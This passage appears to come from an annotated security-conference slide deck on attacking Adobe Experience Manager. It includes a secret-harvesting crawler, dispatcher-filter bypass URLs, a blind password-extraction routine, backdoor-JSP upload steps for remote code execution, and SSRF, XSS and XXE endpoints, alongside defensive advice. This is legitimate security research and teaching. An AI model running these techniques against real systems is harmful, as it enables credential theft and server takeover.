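            dump(("/" if path == "/" else path + "/") + key, get, findings)
        elif key in USER_PROPS:
            findings["users"].add(value)
        elif SECRET_RE.search(key):
            findings["secrets"].append((path, key, value))
    return findings


if __name__ == "__main__":
    result = dump("/")
    for hit in result["secrets"]:
        print("SECRET", *hit)
    print("USERS", sorted(result["users"]))
```

The secret heuristic is deliberately a property-name match; on a real dump you would also want to search values (long base64 strings, JWTs, `AKIA…` prefixes), and to request `.res` for the `jcr:data` of any binary node the crawl turns up.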
44. DefaultGetServlet – In the wild
P1 submission for a private BB program – AEM webapp reveals DB passwords
/apps/<redacted>/config.author.tidy.1..json/a.ico
Note the extra dot and the /a.ico suffix: a URL-based filter sees what looks like an .ico request, while Sling still resolves it to the config.author node with the tidy and 1 selectors and the json extension.
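Why the URL tricks on slide 28 (repeated slashes) and slide 44 (selectors plus a static-looking suffix) work: the dispatcher matches its filter globs against the literal request URL, while Sling decomposes the same URL into resource path, selectors, extension and suffix before picking a servlet. The following is an added example for this page, not Adobe's dispatcher code or the speaker's tool; the rule syntax is reduced to ordered (type, glob) pairs with last match wins and an assumed default of deny, the node set is constructed, and the resolver is a simplified model of Sling's longest-existing-prefix algorithm.

```python
"""Model of a dispatcher filter in front of a Sling resource resolver.

Added example; DENYLIST_RULES, EXTENSION_RULES and NODES are constructed,
and both dispatcher_allows() and sling_resolve() are simplifications of the
real products that keep only the behaviour relevant to the bypasses.
"""
from fnmatch import fnmatchcase
import re

# "Allow everything, block a few sensitive paths" style configuration.
DENYLIST_RULES = [
    ("allow", "*"),
    ("deny", "/bin/*"),
    ("deny", "/etc.*"),
    ("deny", "/etc/*"),
]
# "Block everything, allow URLs that look like static assets" style configuration.
EXTENSION_RULES = [
    ("deny", "*"),
    ("allow", "*.html"),
    ("allow", "*.ico"),
    ("allow", "*.png"),
]

# Constructed JCR node paths standing in for the Publish repository.
NODES = {
    "/", "/bin", "/bin/querybuilder", "/etc", "/etc/cloudsettings",
    "/apps", "/apps/site", "/apps/site/config.author",
}


def dispatcher_allows(request_path, rules):
    """Evaluate rules in order against the literal path; the last matching rule
    wins and no match means deny (assumed default)."""
    verdict = False
    for rule_type, glob in rules:
        if fnmatchcase(request_path, glob):
            verdict = rule_type == "allow"
    return verdict


def sling_resolve(request_path, nodes=NODES):
    """Return (resource_path, selectors, extension, suffix) or None.

    Repeated slashes are collapsed (the Publish instance accepts ///etc.json for
    /etc.json, as slide 28 shows); the resource is the longest prefix, cut at a
    '.' or '/', that exists as a node; the remainder is '.sel1.sel2.ext' followed
    by an optional '/suffix'. Empty selectors from a double dot are dropped."""
    path = re.sub(r"/{2,}", "/", request_path)
    cut_points = [i for i, ch in enumerate(path) if ch in "./" and i > 0]
    candidates = [path] + [path[:i] for i in sorted(cut_points, reverse=True)]
    resource = next((c for c in candidates if c in nodes), None)
    if resource is None:
        return None
    rest = path[len(resource):]
    selectors, extension, suffix = [], "", ""
    if rest.startswith("/"):
        suffix = rest
    elif rest.startswith("."):
        slash = rest.find("/")
        sel_ext = rest[1:] if slash == -1 else rest[1:slash]
        suffix = "" if slash == -1 else rest[slash:]
        parts = sel_ext.split(".")
        extension = parts[-1]
        selectors = [p for p in parts[:-1] if p]
    return resource, selectors, extension, suffix


def probe(request_path, rules, nodes=NODES):
    """What the filter decides versus what the backend would actually render."""
    return {
        "dispatcher": "allow" if dispatcher_allows(request_path, rules) else "deny",
        "sling": sling_resolve(request_path, nodes),
    }


if __name__ == "__main__":
    for p in ("/etc.json", "///etc.json",
              "/bin/querybuilder.json", "///bin///querybuilder.json"):
        print(f"{p:46} {probe(p, DENYLIST_RULES)}")
    for p in ("/apps/site/config.author.1.json",
              "/apps/site/config.author.tidy.1..json/a.ico"):
        print(f"{p:46} {probe(p, EXTENSION_RULES)}")
```

The defensive reading is the same as the offensive one: a filter that only inspects the literal URL cannot be the single security layer. Normalise the path before matching, write rules against selectors and extensions as Sling will parse them, and keep the Publish instance itself hardened (ACLs, updates) so that a bypass of the front end is not a full compromise.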
45. QueryBuilder: JsonServlet & FeedServlet
• We can search the JCR using different predicates
  • https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
• QueryBuilderJsonServlet returns nodes and their props (DefaultGetServlet on steroids)
• QueryBuilderFeedServlet returns nodes only (no props)
  • but a blind binary search can still recover prop values
50. Examples of useful searches
hasPermission=jcr:write&path=/content
P2 submission for Twitter BB – Persistent XSS with CSP bypass
Root cause:
• /content/usergenerated/etc/commerce/smartlists was writable for the anonymous user
• the POST servlet was accessible to the anonymous user
52. Examples of useful searches
path=/etc&path.flat=true&p.nodedepth=0
path=/etc/cloudsettings&p.hits=full&p.nodedepth=-1
Comparable DefaultGetServlet requests:
/etc.childrenlist.json
/etc/cloudsettings.-1.json
53. GQLSearchServlet
• GQL is a simple fulltext query language, similar to Lucene or Google queries
  • https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
• Returns node names (not props)
  • but a blind binary search can still recover prop values
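Slides 45 and 53 both note that a search endpoint which returns only node names still leaks property values through a blind binary search. This added example (not the speaker's code) shows the extraction logic: the search servlet is reduced to `Oracle`, a boolean question "does any node under PATH have PROP >= candidate?", and `extract()` recovers the value one character at a time, binary-searching a sorted alphabet at each position. How that question is phrased as a QueryBuilder or GQL predicate against a real instance is an assumption the talk does not spell out; the comparison is assumed lexicographic by code point, as Python's is. The repository fragment is constructed.

```python
"""Blind binary-search extraction of a JCR property through a nodes-only oracle.

Added example; REPO is constructed and Oracle stands in for a search servlet
whose only observable output is whether any node matched.
"""
import string

# Sorted alphabet: the search needs a total order, and every character of the
# target must be present (constructed choice; widen it for other data).
ALPHABET = "".join(sorted(set(string.ascii_letters + string.digits + string.punctuation + " ")))

# Constructed repository fragment; only the oracle ever sees the values.
REPO = {
    "/etc/cloudservices/crm/jcr:content": {"password": "s3cr3t-P@ss"},
    "/etc/cloudservices/mail/jcr:content": {"password": "R3lay!2018"},
}


class Oracle:
    """Answers 'is there a node under `path` whose `prop` is >= candidate?' and
    counts queries so the cost of an extraction can be measured."""

    def __init__(self, repo, path, prop):
        self.values = [n[prop] for p, n in repo.items() if p.startswith(path) and prop in n]
        self.queries = 0

    def __call__(self, candidate):
        self.queries += 1
        return any(v >= candidate for v in self.values)


def extract(oracle, alphabet=ALPHABET, max_len=64):
    """Recover the lexicographically greatest value the oracle covers.

    With a known prefix p, value >= p + c holds exactly when the next character
    is >= c, so the largest c that satisfies the oracle is the next character.
    Each position costs at most 1 + ceil(log2(len(alphabet))) queries; when no
    extension of p satisfies the oracle the value is exactly p."""
    known = ""
    for _ in range(max_len):
        if not oracle(known + alphabet[0]):
            break
        lo, hi = 0, len(alphabet)        # invariant: oracle(known + alphabet[lo]) is True
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(known + alphabet[mid]):
                lo = mid
            else:
                hi = mid
        known += alphabet[lo]
    return known


if __name__ == "__main__":
    o = Oracle(REPO, "/etc/cloudservices/crm", "password")
    print(extract(o), "recovered in", o.queries, "queries")
```

When several nodes under the searched path carry the property, the oracle's `any()` makes the procedure return the greatest value; narrow `path` to one node to read a specific one. A hit-count oracle that answers prefix questions instead (a `like 'prefix%'` style predicate) works with the same loop but needs a linear scan of the alphabet per character rather than a binary search.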
69. Uploading a backdoor JSP script
• Create a node rcenode somewhere with the property sling:resourceType=rcetype
• Create the node /apps/rcetype and upload html.jsp with the payload into it
• Open https://aem-site/rcenode.html?cmd=ifconfig: Sling renders rcenode with the html.jsp script registered for its resource type, so the payload runs on the Publish server
• https://github.com/0ang3el/aem-hacker/blob/master/aem-rce-sling-script.sh
77. SSRF in SalesforceSecretServlet
CVE-2018-5006
• Versions: 6.0, 6.1, 6.2, 6.3, 6.4
• Not blind: the servlet makes a POST request to the supplied URL and returns the response
• Leak secrets (e.g. IAM role credentials), reflected XSS (bypasses XSS filters)
• https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html
/libs/mcm/salesforce/customer.json
81. SSRF in SiteCatalystServlet
No CVE from Adobe PSIRT
• Blind: sends POST requests, the response is not returned
• Arbitrary HTTP headers can be added via CRLF or LF injection
• HTTP request smuggling (works against Jetty)
/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet
/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json
84. SSRF in AutoProvisioningServlet
No CVE from Adobe PSIRT
• Blind: sends POST requests, the response is not returned
• Arbitrary HTTP headers can be injected
• HTTP request smuggling (works against Jetty)
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json
87. SSRF to RCE
• It is possible to escalate the two header-injecting SSRFs to RCE on the Publish server
• Tested on AEM 6.2 before the AEM-6.2-SP1-CFP7 fix pack
• https://www.adobeaemcloud.com/content/marketplace/marketplaceProxy.html?packagePath=/content/companies/public/adobe/packages/cq620/cumulativefixpack/AEM-6.2-SP1-CFP7
88. SSRF to RCE
• Topology is used by the replication mechanisms in AEM
  • https://sling.apache.org/documentation/bundles/discovery-api-and-impl.html
  • https://helpx.adobe.com/experience-manager/kb/HowToUseReverseReplication.html
• To join the topology, a PUT request must be sent to TopologyConnectorServlet
• TopologyConnectorServlet is accessible on localhost only (default)
• Via SSRF with HTTP smuggling we can reach TopologyConnectorServlet from localhost
89. SSRF to RCE
• When a node joins the topology, a reverse replication agent is created automatically
• The reverse replication agent replicates nodes from the malicious AEM server to the Publish server … and arbitrary nodes (e.g. a script under /apps, as on slide 69) mean RCE!
92. XSS variants
Persistent
• Create a new node and upload an SVG (needs jcr:write, jcr:addChildNodes)
• Create a new node property with the XSS payload (needs jcr:modifyProperties)
Reflected
• SWF XSSes from @fransrosen
• WCMDebugFilter XSS – CVE-2016-7882
• See the Philips XSS case by @JonathanBoumanium
• Many servlets return HTML tags in the JSON response
105. XXE via WebDAV
• Old bug, CVE-2015-1833
• Local files can be read via PROPFIND/PROPPATCH
• https://www.slideshare.net/0ang3el/what-should-a-hacker-know-about-webdav
106. XXE via WebDAV – is WebDAV support on?
• Send an OPTIONS request
  • the Allow header in the response lists WebDAV methods (e.g. PROPFIND, PROPPATCH)
• Navigate to /crx/repository/test
  • HTTP 401 with WWW-Authenticate: Basic realm="Adobe CRX WebDAV"